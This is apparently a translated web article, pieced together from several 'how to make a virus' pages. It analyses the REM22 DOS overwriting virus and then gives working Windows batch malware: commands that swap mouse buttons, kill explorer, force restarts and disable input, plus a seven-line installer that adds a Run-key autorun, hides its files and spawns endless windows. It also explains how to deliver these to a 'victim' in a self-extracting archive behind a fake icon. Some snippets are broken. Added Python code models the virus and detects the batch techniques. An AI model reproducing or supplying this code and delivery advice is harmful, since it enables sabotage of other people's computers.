How to create a virus? Computer viruses. How to make a joke virus. How to create and write a computer virus? How to make viruses in notepad like bat

“He travelled somewhere for a long time in an uncomfortable hard package; he was shaken and rocked, and his body demanded food. He did not understand why he, who had only just been born, had been thrown out of the house... Finally the shaking stopped, and someone strange and rude opened the archive attached to the letter. A young, curious virus poked its head out and made its first division..."

In this article I will share my experience of writing viruses. The basic principle of operation of any virus can be expressed in a few words: the body of the virus is treated as code while it executes, and as data while it infects. There are many types of viruses and different methods of infection. Naturally, the actual mechanism of a virus's actions depends on the specific operating system. There are, for example, viruses that work in the protected mode of the processor (maximum privilege level and absolute addressing of all memory). Companies like AVP have to spend a lot of time and resources treating such specimens. The only thing that saves the antivirus makers is the very small number of truly professional viruses.

In order to learn how to write viruses yourself, you only need to know the basics of assembler. I mean that with basic knowledge you can try to write your own viruses and research existing ones. Other useful, and sometimes necessary, knowledge will come as you study other people's creations. Among the resources on this topic, I can recommend a page containing a huge number of books and articles:
http://vx.netlux.org/lib_rus.shtml.
All its documents are written in a very understandable and accessible language. There is also a well-known electronic magazine, Infected Voice. It has a convenient navigation system that lets you find new materials (sources and articles). This magazine is published once every six months (at least it used to be; I'm not sure now) and contains all the innovations in this area.

Suppose you found the source of a virus and want to investigate it. How do you do this? To be honest, I myself encountered this problem for the very first time. My question was this: I have the text of a virus, I want to see how it works, and at the same time I'M AFRAID OF IT! This is completely real: what will stop this virus from corrupting my CMOS or wiping my hard drive? Answer: nothing. If you act incorrectly, the virus can do you the harm it is programmed to do. However, the algorithm for acting correctly is quite simple. Now we will figure it out.

We will assume that the source code of the virus is written in assembly language. This language is ideal for writing viruses. As is known, assembler has only two instructions that perform "real" actions (meaning actions that can produce irreversible changes on the hard drive or somewhere else): "INT" and "OUT"; all other instructions work with processor registers and flags (this is rather rough, but by and large true). We do not consider Win API functions, since they can in principle be regarded as a replacement for DOS interrupts, and calling them as a replacement for the "INT" instruction.

A little information for beginners or those who have not written in assembler for a long time: the "INT" instruction is used to call DOS or BIOS interrupts, and the "OUT" instruction is used to write data to a port. For the "INT" instruction the function number is (most often) given in the AH register, and for the "OUT" instruction the AL, AX or EAX register holds the data written to the port.

So. Take any debugger. Since you first need to understand viruses under DOS (they still work under Windows), any debugger will do: Turbo Debugger from Borland, CodeView from Microsoft, AFDPRO or AVPUTIL. Next, load the source into the debugger and trace it step by step. The main thing is to stick to ONLY ONE RULE. It can be called golden.
ATTENTION: you can safely execute the source code of your virus, but as soon as you reach an "OUT" or "INT" instruction, immediately stop and start analyzing.

You must analyze:

  • number of the called interrupt or recording port;
  • number of the function called or data written to the port.

To understand the real actions of these instructions, use Tech Help, any assembler reference, or any book. The main thing is that you can find information on every interrupt and port in your source. This way you can understand what the next instruction will do without executing it on your computer. While tracing, record all the data (register states, instruction addresses, called functions, etc.) on a piece of paper. Then, by the time the function is called (or the port is written to), you will be fully armed and able to determine what will happen if you execute the next instruction. This will also help you with a comparative analysis of changes in registers and flags.

Once you understand what an instruction ("INT" or "OUT") does, skip it and move on until you reach the end of the file or the next such instruction. As a result, you will be able to take any virus apart piece by piece and understand how it functions.

Let's look at an example. For this purpose, I took a small virus written by a certain Reminder. I got it from the eleventh issue of Infected Voice. It was there without comments, so I had to do all the work myself. What attracted me to this creation: the very small source code, the very small size of the compiled executable, and the (at first glance) incomprehensible algorithm. Here is its source code (by the way, it is called REM22):

Model tiny
.code
.startup
start:
pop cx
hel:
xchg ax,bx
db 108h shr 1
db 4eh ; dec si
db 9eh shr 1
db 3ch ;cmp al,xx
db 100h shr 1
db 40h
fmask db "*.*",0
lodsw
cwd
mov dl,al
shl dx,1
int 21h
jmp hel
end

This virus, in my opinion, is a masterpiece, because organizing a reproduction mechanism in such a small size is truly a work of genius. When we figure out what it does and how, everything will fall into place. In the meantime, it should be noted: in principle, this virus does not carry out any destructive actions (I think reproduction cannot be considered such), but it infects all files in the same directory. It is not a "professional" virus, that is, it lacks many mechanisms characteristic of serious creations:

  • there is no “friend/foe” mechanism (the virus infects everyone indiscriminately, even itself or already infected objects);
  • the infection occurs only in files in the same directory (try compiling it and running it in a folder where there is nothing besides it :));
  • the virus is not polymorphic (does not encrypt itself and does not change its code);
  • the virus does not have destructive effects;
  • the virus is not resident.

Let's take a look inside our overwriter. The source is a template for creating an exe file. ".startup" is a TASM directive; you can do without it, but then you have to write "org 100h" and put a label after it (and at the end, after "end", put the name of the label). The rest of the instructions can easily be looked up in any book to see what they do (don't be lazy). All that remains is to figure out what these instructions do together as a whole.

This masterpiece is an ordinary loop that repeats 6 times. What happens in the loop? We call int 21h with six different functions (93, 4E, 3C, 40, 2E, 00). Let's look at them in order:

"pop cx" is only there to zero cx (at the top of the stack, as you know, there is a zero at the start of the program). What for? In order to get CH=01 on the SUB CH instruction (look for it; it should be at offset 108h in the debugger) (at offset 2Ah, which is somewhere in the PSP, FFh is always located), i.e. you could avoid showing off and just write sub ch,0ffh, but that would change the program code... It turns out that:
"*.*",0 = sub CH,[2Ah], and this is a ready-made mask for searching... THAT'S WHERE THE GENIUS IS!!!

That is, sub ch,ffh is "Ae" (in ASCII codes, with a space at the end). Further, everything from offset 101 (code 93) to offset 10B (code 00) is FUNCTION NUMBERS FOR int 21h!!! I.e. these are the 6 functions that we call in turn in the loop (see their numbers above), and the instructions that come out of them are just tinsel. They make ABSOLUTELY NO SENSE! THEY ARE SIMPLY WHAT YOU GET IF YOU ASSEMBLE THE FUNCTION NUMBERS IN A ROW. That is, if I write TANAT, it will translate into some sequence of instructions, right? But it is essentially data... although in this program you can't even call it data; these are just FUNCTION NUMBERS for int 21h, that's the GENIUS!!! There is no point in telling more, because in each of the six iterations a function is called, and all the registers are roughly tailored to the ideal... Look:

The first time, function 93h is called: Pipe (Error). For the program itself it DOES NO WORK, DOES NOTHING USEFUL; IT'S JUST SUPERFLUOUS, IT'S NOT NEEDED, IT'S AN EXTRA ITERATION, BUT GIVEN the genius of the code, it simply ARISES BY ITSELF AND THERE IS NO GETTING AWAY FROM IT!!! There will be another such "bogus" function; see below.

Second: 4Eh - this is what we need! Search for a file, and at the moment of the call DX holds the offset of the file mask (108h)!!!

Third: 3Ch - file creation. This is another "bogus" function. We don't need it. There is no need for us to create a file (after all, we only need to write ourselves into the file that we found in the previous step). DX holds some bogus garbage that naturally has nothing to do with the file name, so CF=1 and we move on to the next iteration.

Fourth: 40h - Write to file. Now this is what we need! DX contains the offset 100h (i.e. the beginning of REM22), but CX is a little disappointing: it is equal to 400h, i.e. 400h bytes will actually be written to the beginning of the found file, while REM22 takes only 22 bytes, i.e. 1002 extra bytes will be written. That's true. But given the genius of the code :), this can be forgiven.

Fifth: 2Eh - Set Verify Flag. This is the MOST bogus function; here it is simply the program's appendix.

Sixth: 00h - this turns out to be an exit from the program (I didn’t know either).

That's all: we have 6 iterations, of which only 3 are meaningful: search, write and exit. Most likely, a lot will remain unclear to you. To figure it out, load the source into the debugger, trace it, watch the state of the data in the registers, and look at my comments. Then everything will become clear. In conclusion I'm providing a debugging table so you don't have to build it yourself (you'll see what it should look like). In principle, the table alone should be enough to understand what is happening in this virus, but I think comments will not be superfluous.

ADR  CODE         ASM                  1                    2                    3                    4                    5                     6
100  59           POP CX               CX=0                 -                    -                    -                    -                     -
101  93           XCHG AX,BX           AX=BX=0              AX=0, BX=9300h       AX=9300h, BX=0       AX=0, BX=0005h       AX=0005h, BX=0400h    AX=0400h, BX=2E00h
102  84 4E 4F     TEST [BP+4Fh],CL     -                    -                    -                    -                    -                     -
105  3C 80        CMP AL,80h           -                    -                    -                    -                    -                     -
107  40           INC AX               AX=0001h             AX=0001h             AX=9301h             AX=0001h             AX=0006h              AX=0401h
108  2A 2E 2A 00  SUB CH,[2Ah]         CX=0100h             CX=0200h             CX=0300h             CX=0400h             CX=0500h              CX=0600h
10C  AD           LODSW (DS:SI->AX)    AX=DS:100=9359h      AX=DS:102=4E84h      AX=DS:104=3C4Fh      AX=DS:106=4080h      AX=DS:108=2E2Ah       AX=DS:10A=002Ah
10D  99           CWD (DX=sign of AX)  DX=FFFFh             DX=0000h             DX=0000h             DX=0000h             DX=0000h              DX=0000h
10E  8A D0        MOV DL,AL            DX=FF59h             DX=0084h             DX=004Fh             DX=0080h             DX=002Ah              DX=002Ah
110  D1 E2        SHL DX,1             DX=FEB2h             DX=0108h             DX=009Eh             DX=0100h             DX=0054h              DX=0054h
112  CD 21        INT 21h              AH=93 (Pipe) Error   AH=4E (FindFirst)    AH=3C (CreateFile)   AH=40 (WriteFile)    AH=2E (SetVerifyFlag) AH=00 (Terminate)
114  EB EB        JMP SHORT 101        ???                  -                    -                    -                    ???                   -
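To make the table easier to check, here is a small Python model of the REM22 loop, an added example that is neither Reminder's code nor part of the original article. It derives the six function numbers and the CX/DX values from the 22 program bytes alone; the value DOS leaves in AX after each int 21h is copied from the table above rather than computed, and the initial SI=100h is taken from the table's LODSW row.

```python
"""Model of the REM22 loop that reproduces the page's debugging table.
Added example: it computes only what the loop derives from its own bytes;
the AX value DOS returns after each call is copied from the page's table."""

# The 22 assembled bytes of REM22 as they sit at CS:100h (the table's CODE column).
IMAGE = bytes.fromhex("59 93 84 4E 4F 3C 80 40 2A 2E 2A 00 AD 99 8A D0 D1 E2 CD 21 EB EB")
ORG = 0x100
PSP_BYTE_2A = 0xFF    # page: the byte at PSP offset 2Ah is always FFh

# AX after each int 21h call, as recorded in the page's trace (not computed here).
AX_AFTER_DOS_CALL = {0x93: 0x9300, 0x4E: 0x0000, 0x3C: 0x0005, 0x40: 0x0400, 0x2E: 0x2E00}

DOS_FUNCTIONS = {0x93: "Pipe (error)", 0x4E: "FindFirst", 0x3C: "CreateFile",
                 0x40: "WriteFile", 0x2E: "SetVerifyFlag", 0x00: "Terminate"}


def trace_rem22():
    """Run the loop until the AH=00h exit; return one dict per int 21h call with
    the registers the call sees (AH = function number, BX, CX, DX, SI)."""
    ax = bx = cx = 0          # COM entry: AX=BX=0; 'pop cx' pops the zero word DOS pushed
    si = ORG                  # table: the first lodsw reads DS:100h, so SI starts at 100h
    rows = []
    while True:
        ax, bx = bx, ax                        # xchg ax,bx
        # test [bp+4Fh],cl and cmp al,80h only set flags: nothing to model
        ax = (ax + 1) & 0xFFFF                 # inc ax
        ch = ((cx >> 8) - PSP_BYTE_2A) & 0xFF  # sub ch,[2Ah]: 00h - FFh wraps to 01h
        cx = (ch << 8) | (cx & 0xFF)
        off = si - ORG
        ax = IMAGE[off] | (IMAGE[off + 1] << 8)  # lodsw: AX = word at DS:SI, SI += 2
        si += 2
        dx = 0xFFFF if ax & 0x8000 else 0      # cwd: sign-extend AX into DX
        dx = (dx & 0xFF00) | (ax & 0xFF)       # mov dl,al
        dx = (dx << 1) & 0xFFFF                # shl dx,1
        ah = ax >> 8                           # the high byte of the word just loaded
        rows.append({"ah": ah, "name": DOS_FUNCTIONS[ah],
                     "bx": bx, "cx": cx, "dx": dx, "si": si})
        if ah == 0x00:
            return rows                        # int 21h / AH=00h terminates the program
        ax = AX_AFTER_DOS_CALL[ah]             # what DOS left in AX, per the page's table
        # jmp short hel: back to xchg ax,bx


def function_sequence():
    """The six AH values the loop feeds to int 21h, in call order."""
    return [r["ah"] for r in trace_rem22()]


if __name__ == "__main__":
    for i, r in enumerate(trace_rem22(), 1):
        print(f"call {i}: AH={r['ah']:02X}h {r['name']:<14} "
              f"BX={r['bx']:04X}h CX={r['cx']:04X}h DX={r['dx']:04X}h")
```

Running it prints the six calls; note that call 2 gets DX=0108h, which is exactly where the "*.*",0 bytes of the sub ch,[2Ah] instruction sit in the image.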

Oddly enough, not only computer geniuses and smart programmers are interested in information about how to create a virus, but also ordinary personal computer users. Sometimes vindictive people deliberately intend to harm the victim by creating malicious software, but most often this is just a cybernetic hoax. Any penetration into a computer by third parties or deliberate harm to software is punishable by the laws of many countries. This article on how to make a virus can only be used to help the user understand how Windows NT commands are used.

Creation of a virus

Every novice PC user can create their own computer virus. To do this, it is not at all necessary to have knowledge of programming. It is enough to have the desire, a little free time to understand the simplest commands, and, of course, a computer. This article will teach you how to create a virus in Notepad. In this case, we will work without various interpreters; we will not place the code in specialized development environments. What is the essence of this method? Our program (virus) will be executed by converting a text file into a Windows batch file with the *.bat extension. After it is launched, all the actions that you specify in the executable file will be carried out. Now you know in theory how to create a virus, so you can move on to a more detailed study of this topic. I want to warn you that these viruses are not intended for serious things. Although they can harm your computer, the scale of the tragedy is small. You will not be able to steal information from the victim, much less spy on them. It's time to show you how to create a virus. To do this, I advise you to learn how to use Windows NT control commands, some of which will be described below. Open a regular text editor and type the following command in it: @echo off.

Congratulations, you have disabled command echoing. Now, after running your virus, the victim will not notice the malicious code executing, because the whole process will be hidden from their eyes. Next, on a new line, type the following code: %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul.

There is no point in explaining each command, but the gist of it is that your mouse buttons are now programmed in reverse order (the button assignments have been swapped). Now save this file and change its extension (instead of *.txt put *.bat). Here is a Windows batch file, after running which your mouse will not work properly. You got a clear example of how to create a virus, and if this interests you, you can continue to study these kinds of commands and dig deeper into this niche. If you want to seriously scare your victim, you can add the following lines:

taskkill /f /im explorer.exe >nul
shutdown -r -t 1 -c "lol" -f >nul

The first line is to disable the "explorer.exe" process, and the next line is to simply restart the computer. Your task is to add new commands to your virus from a new line, then save the file and change its extension. You're almost a hacker. Now let's slip this file to the victim. You must place the created file with the bat extension in a special SFX archive, after selecting the “Run after unpacking” option. Now the victim’s computer will be automatically infected with this virus after opening the archive. All that remains is to send our “gift”.

Everything has already been invented

But why reinvent the wheel if experienced programmers and hackers have made our lives so much easier? In the public domain, you can easily find a program called “Kuzya Virus Generator”. You will not need to write all the commands manually. You just need to select the desired action, and the program will automatically create this malicious file for you.

Malicious software is software whose purpose is to gain unauthorized access to computer resources or to information on the hard drive. It is often created to cause harm by copying, distorting, deleting or substituting information. Let's look further at how to create a joke virus and how to protect yourself from viruses.

What is a virus

Before you create a virus, you need to define exactly what it is. For a program to be considered malicious, it must:

  • destroy information or disrupt computer operation;
  • be carried out without warning;
  • have a clear purpose of unauthorized access or destruction of information.

Computer viruses must meet all of the above criteria. For example, a copy protection cracker is not malware. It does not destroy files; it only guesses a password to unlock the program. Likewise, a disk formatting program cannot be considered malicious. It destroys data on the computer, but does so with the user's consent. If a program destroys information due to internal errors, it is also not considered a virus, although the developers may be liable for negligence in their work or as violators of consumer rights, because the program could delete important data. In general, clear criteria have not yet been defined. To decide whether a program is a virus, a software and technical examination is carried out.

Types of viruses

Why are viruses created? There are many reasons. Some of the malicious files are truly dangerous and can harm the performance of the machine, while others cause harm indirectly. List of main goals:

  1. Destabilization.
  2. Installation of other malware.
  3. Theft, fraud, espionage.
  4. Adware.
  5. Other.

Computer viruses create interference; this can be the causeless opening and closing of the disk drive tray, or hardware failure.

Some programs behave quite cunningly. Downloading media files from an infected link may result in the download of malware.

To steal information, hard drive scanning, keystroke logging and redirecting the user to a fake website are used. In this way accounts are stolen and used to send spam, payment systems are hacked, and computers are locked in order to extort money. It can also be paid software that does nothing useful after downloading.

Because of an infected file, a public proxy server can be set up on a computer, and the machine will become a member of a botnet and be used to carry out DDoS attacks. With the popularization of Bitcoin, cases of hidden mining on users' PCs have become more frequent.

There are also programs that display advertisements or collect various information for marketing purposes.

How to create viruses

In Notepad (or rather, in any text editor) you can create a malicious program, and you can do this in the same way as you create regular programs. Any programming language can be used; usually it is C++, but it can also be Delphi or .Net. The purpose of creating a virus could be a joke or an introduction to how it works. A simple program is written directly in Notepad, and the code itself takes up very few lines.

You can completely prevent a virus from getting onto your computer by turning off the Internet and refusing to use illegal software. Files containing viruses can function without an Internet connection. In this case, they will damage the information on the user’s hard drive or cause programs to function incorrectly.

Today, the main goal of hackers is not the development of destructive programs that clearly harm the operation of the system, but the creation of products that behave quietly. They can work for a long time and at one point cause very serious harm.

Signs of infection

Before creating a virus, attackers analyze all the ways in which it can be detected and try to bypass them. Antiviruses effectively find malicious files, but due to user error some of them may be added to the exceptions. In order to react in time when your computer is infected, you need to watch for suspicious and strange behaviour.

The most obvious signs of infection:

  • opening windows with unfamiliar content;
  • blocking access to sites;
  • third-party processes in the "Task Manager";
  • new entries in autorun;
  • inability to make changes to computer settings;
  • Random computer restart or shutdown.

Some of the symptoms may be caused by a joke virus and do not pose a clear threat to the system. And some of them are used to distract attention while the main virus collects data about the user.

Spread of viruses

The attack has several stages. The first answers the question of how to create a virus, that is, this is a technological stage. The second stage delivers malware to the computer. The main ways viruses spread:

  • an exploit uses vulnerabilities in software, with whose help it seizes control over the system and disrupts its functioning;
  • a logic bomb is triggered under a certain condition; it is inseparable from the carrier program into which it is integrated;
  • a Trojan program penetrates a computer under the guise of legitimate software, very often as part of a planned multi-stage attack;
  • worms spread independently through local and global networks, using administrative errors and social engineering tools.

Prevention and treatment

There are antiviruses to protect against viruses. They effectively protect the system, but, as a rule, the user himself is to blame for infecting the system. Therefore you need:

  • install updates in a timely manner and use licensed copies;
  • work on the computer with user rights, not administrator rights;
  • open computer files only from trusted sources;
  • use a firewall.

How to make a joke virus

A virus is, first of all, a program that changes the contents of any files. It is created in the same way as any other program. The simplest versions of malware can be created in Notepad. This does not require special skills or knowledge of programming languages.

How to create viruses in Notepad?

The following lines will create 1000 folders in one second, which will confuse the user:

How to create a virus to steal passwords? It is already more difficult to answer this question. To do this, you need to think about how the user will launch the malicious file and how the data will be stolen. Only then can we begin implementation. This is a very complex process. In addition, it may be illegal, so we do not recommend that readers create viruses for any purpose (except, of course, for educational purposes).

Viruses are written, as a rule, in order to ruin the life of another - to “eat up” free space on his PC, disable the system, “hack” passwords, etc. Despite such consequences, there are viruses created just to have a laugh over a friend. Such a virus is written in five minutes, and it does not do anything critical to the system. The most common joke viruses are turning off the PC, opening the same program multiple times, and displaying funny text.

Such simple viruses are created in the standard Notepad, except that they are saved not with the .txt extension but in the .bat batch file format.

How to make a virus

Let's consider step by step how to write a virus that opens one application multiple times.

  1. Open Notepad - to do this, right-click on the desktop and select "New" → "Text Document".
  2. We begin to fill our virus with commands:
    • @echo off //disable command output in this line
    • echo "process started" //text that the user will see
    • start mspaint
    • goto:p //run the paint program multiple times
    • pause //press any key
    • del %0 //virus self-destruction
  3. For the saved file, change the icon to a more popular one (browser, word, etc.) and enter the appropriate name.

A few more possible pranks:

Some kind of screensaver from the movie "The Matrix"

  • @echo off
  • color 2
  • echo 1185585851851891704148 1185585851851891704148
  • echo 1185585851851891704148 1185585851851891704148
  • echo 1185585851851891704148 1185585851851891704148
  • echo 1185585851851891704148 1185585851851891704148
  • echo 1185585851851891704148 1185585851851891704148
  • echo 1185585851851891704148 1185585851851891704148
  • echo 1185585851851891704148 1185585851851891704148
  • goto:a
  • pause

Changing the operation of mouse buttons

  • %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul

Time change

  • time 0:00

Disabling the keyboard

  • rundll32 keyboard,disable

Disabling the mouse

  • rundll32 mouse,disable

We looked at the simplest and most harmless ways to prank a friend. In fact, by studying the system commands, you can irrevocably "destroy" the system on someone else's computer (and even on your own, through negligence).

You can also learn about the existence of different types of viruses from the article, but you should not delve into this topic so as not to create unnecessary problems for yourself and others. It is better to take care of protecting your own computer and install a reliable anti-virus program so that you yourself do not fall for the prank of a friend or enemy.

Creating the simplest viruses does not require special software development environments. And special knowledge, by the way, too. Creating viruses is quite simple if you use the command line. To do this, you need to know a little command line syntax and be able to create .bat files.

What is a .bat file and how to create it?

Very superficially, these are files with the .bat extension. Such files carry commands that must be executed by the Windows command interpreter. All those commands that can be executed in the command line window can be entered into a .bat file and run. The result will be the same.

To create a .bat virus, we need a regular text editor. Notepad is ideally suited for these purposes. Having created and opened a new text document, you need to enter there the code (commands) that it should execute. After this, use the Save As menu to save this file, giving it a name with the .bat extension and specifying the file type All files.

Creating a simple virus

In this article we will look at creating a virus that, once launched, will endlessly open a command line window. Command line windows that open endlessly and very quickly will not allow the user to work in peace. No one will have time to close them all, and very soon they will fill up the computer’s RAM, which in turn will greatly slow down the computer’s operation, even to the point of completely freezing. It will look something like this:

In addition, we will add our virus to autoload, which will ensure that the virus automatically starts along with the operating system.

Code of the created virus

There are as many different solutions to each problem as there are programmers. I will give one of my methods for solving this one.

md c:\papka
echo start c:\papka\virus.bat>c:\papka\virus.bat
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v virus /d c:\papka\virus.bat
attrib +r +h +s c:\papka
attrib +r +h +s c:\papka\virus.bat
start c:\papka\virus.bat
del %0

Now let's look at the code itself. The first line creates a folder named papka at the root of drive C:. This location is given as an example only. Using the root of C: is not a very good option for a virus. If you want to ensure good survivability for your virus, it is best to hide it away. You can even skip the first command if you drop the virus itself into an already existing directory.

The second line creates the file c:\papka\virus.bat and, using the echo command, writes the command start c:\papka\virus.bat into it. Here you need to know that after the > sign the destination of the given command's output is indicated. Take note: c:\papka\virus.bat is the main body of the virus. The .bat file with the code we created, which we are now analyzing, is just the installer of our main virus. You can use a different name and location for the virus.

The third line puts the virus body we created in the second line into autoload. For this, a user registry branch is used, since the user always has access to it. Using the machine-wide startup is not safe, since the user may not have administrative access, which would cause an unnecessary error.

The fourth and fifth lines of code change the attributes of the virus and of the folder where the virus is stored. With these commands (we use attrib for this) we add the attributes Read Only, Hidden and System both to the folder and to the virus. Using the r (Read only) attribute is optional. The Hidden and System attributes, however, will protect the virus we created well. If you don't believe me, read the article about the virus that . It uses exactly this technique.

The 6th line of code launches our virus. You can skip this point if you want the virus to run for the first time only after you restart your computer.

And finally, the last, 7th line removes this .bat virus. This is useful, because using this .bat file you can easily find the virus we created and remove it.

The meaning of the created virus

The point of the virus, which fits into these 7 lines, is to create the main virus, protect it and ensure its constant operation. And also cover your tracks. What does the main virus do? After the main virus starts, it executes the command that is written into it. And this command, in turn, launches our virus, which again launches itself again. And so on ad infinitum.

How to fight such viruses?

Firstly, the fight against this virus begins after it starts. Very soon the virus will fill your RAM with copies of itself and you won't even be able to move the mouse. Therefore, such a performance must be stopped immediately. The Break key on your keyboard is perfect for this. Press it as many times as necessary until new copies stop being created. On keyboards without a Break key, the Ctrl+C shortcut can help.

How to remove such a virus?

You can remove it via its entry in startup (more details at the link). You can also find the virus using the command that is displayed in the command interpreter window, provided, naturally, that you can get to a hidden system file. This is how a simple virus is created.
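As a defender's counterpart to the 7-line installer analysed above and to the removal question in this last section, here is an added Python triage script (not the page's own code) that reads a .bat file and flags the techniques the page uses: the Run-key autorun entry, dropping a .bat that starts itself, hiding files with attrib, self-deletion, and the prank commands from the Notepad section (mouse swap, killing explorer, forced shutdown), then derives the undo steps a responder needs. Both batch samples embedded in it are constructed from the page's own listings.

```python
"""Static triage of Windows batch (.bat) files for the persistence and nuisance
techniques described on this page. Added example, not the page's own code."""
import re

# Constructed sample 1: the 7-line installer listed on the page.
SAMPLE_INSTALLER = r"""md c:\papka
echo start c:\papka\virus.bat>c:\papka\virus.bat
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v virus /d c:\papka\virus.bat
attrib +r +h +s c:\papka
attrib +r +h +s c:\papka\virus.bat
start c:\papka\virus.bat
del %0
"""

# Constructed sample 2: the prank commands from the Notepad section, joined into one file.
SAMPLE_PRANK = r"""@echo off
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
taskkill /f /im explorer.exe >nul
shutdown -r -t 1 -c "lol" -f >nul
"""

# Detection rules: (name, regex, severity). Every pattern is taken from the page's listings.
RULES = [
    ("autorun_registry", re.compile(r"\breg\s+add\b.*\\CurrentVersion\\Run\b", re.I), "high"),
    ("drops_batch",      re.compile(r"\becho\b.*>\s*\S+\.bat\b", re.I), "medium"),
    ("hides_file",       re.compile(r"\battrib\b(?=.*\+h\b)(?=.*\+s\b)", re.I), "medium"),
    ("self_delete",      re.compile(r"\bdel\s+%0\b", re.I), "medium"),
    ("kills_explorer",   re.compile(r"\btaskkill\b.*\bexplorer\.exe\b", re.I), "medium"),
    ("forced_shutdown",  re.compile(r"\bshutdown\b.*[-/][rs]\b", re.I), "medium"),
    ("swaps_mouse",      re.compile(r"\brundll32\b.*\buser32\s*,\s*SwapMouseButton\b", re.I), "low"),
    ("disables_input",   re.compile(r"\brundll32\b.*\b(keyboard|mouse)\s*,\s*disable\b", re.I), "low"),
]


def triage_bat(text):
    """Return (line_number, rule_name, severity) for every rule that fires."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx, severity in RULES:
            if rx.search(line):
                findings.append((lineno, name, severity))
    return findings


def self_spawn_targets(text):
    """Find the endless-window trick: an 'echo start X>X' line that drops a batch
    file whose only content is a command launching that same file."""
    rx = re.compile(r"\becho\s+start\s+(\S+)\s*>\s*(\S+)", re.I)
    hits = []
    for line in text.splitlines():
        m = rx.search(line)
        if m and m.group(1).lower() == m.group(2).lower():
            hits.append(m.group(2))
    return hits


def cleanup_plan(text):
    """Derive the undo steps for the persistence the file sets up: delete the Run
    value, strip the r/h/s attributes it added, and remove the dropped .bat file."""
    run_rx = re.compile(r"\breg\s+add\s+(\S+)\s+/v\s+(\S+)\s+/d\s+(\S+)", re.I)
    attrib_rx = re.compile(r"\battrib\s+((?:[+-][rhsa]\s+)+)(\S+)", re.I)
    steps = []
    for line in text.splitlines():
        m = run_rx.search(line)
        if m:
            key, name, _path = m.groups()
            steps.append(f"reg delete {key} /v {name} /f")
        m = attrib_rx.search(line)
        if m:
            path = m.group(2)
            steps.append(f"attrib -r -h -s {path}")   # unhide before it can be deleted
            if path.lower().endswith(".bat"):
                steps.append(f"del {path}")
    return steps


if __name__ == "__main__":
    for label, sample in (("installer", SAMPLE_INSTALLER), ("prank", SAMPLE_PRANK)):
        print(f"== {label} ==")
        for lineno, name, severity in triage_bat(sample):
            print(f"  line {lineno}: {name} [{severity}]")
        for path in self_spawn_targets(sample):
            print(f"  self-spawning batch file: {path}")
        for step in cleanup_plan(sample):
            print(f"  cleanup: {step}")
```

The cleanup steps are printed, not executed, so a responder can review them before running them on the affected machine.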